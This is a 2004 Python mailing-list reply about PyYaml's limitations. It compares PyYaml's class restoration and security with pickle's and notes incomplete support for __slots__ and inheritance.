PyYaml?
Chris S.
chrisks at NOSPAM.udel.edu
Sat Sep 18 01:26:28 EDT 2004
Andrew Dalke wrote:
> Looking at the PyYaml docs, under "limitations"
>
>
> ] PyYaml converts Python builtin types bidirectionally, and converts
> ] instances unidirectionally (although with directives eg from_yaml
> ] and to_yaml it can do this bidirectionally). When YAMLizing an
> ] instance, PyYaml serializes only its instance data (its '.dict'),
> ] with no meta-information about which class it came from.
>
> Add support for restoring an arbitrary class and you end
> up with exactly the same security problems pickle has.
I believe those docs are slightly out dated. PyYaml does have limited
support for class restoration (at least in my experience). Granted the
class definition must be loaded into the current frame, a similar
limitation of Pickle. However, Pickle's small programming language
allows for arbitrary file deletion. That would not be possible with Yaml.
> Also, I'll guess that it doesn't handle Python's new __slots__
> since it only mentions __dict__.
True. In fact, the current implementation doesn't yet fully handle
subclassing/inheritance. They've done a lot, but it's still a work in
progress.
More information about the Python-list
mailing list